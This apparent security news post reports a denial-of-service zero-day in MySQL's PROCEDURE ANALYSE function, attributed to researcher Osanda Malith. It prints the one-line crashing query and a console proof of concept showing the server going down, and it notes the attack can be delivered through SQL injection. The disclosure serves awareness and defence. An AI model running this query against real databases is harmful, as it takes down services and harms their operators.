A new MySQL zero-day has been discovered by Osanda Malith a security researcher and reverse engineer.
This zero-day allows the attacker to perform a denial of service (DOS) attack on any server running MySQL versions 5.5.45 and above. This exploit exists in the procedure analyse() function and crashes when passing this sub query:
SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);
Here’s a proof of concept (POC) provided by Osanda:
--------------------------------------------------------------------------------------------------------------- mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1); ERROR 2013 (HY000): Lost connection to MySQL server during query mysql> mysql> select 1; ERROR 2006 (HY000): MySQL server has gone away No connection. Trying to reconnect... ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061) ERROR: Can't connect to the server mysql> ---------------------------------------------------------------------------------------------------------------
After executing the command, MySQL will become unresponsive, preventing the site from working. Obviously access to the SQl database will be needed, but this can be done if the site is vulnerable to an SQL injection.
Video POC:
For a more in depth analysis, visit Osanda’s blog, here.
Download his POC script written in Python, here.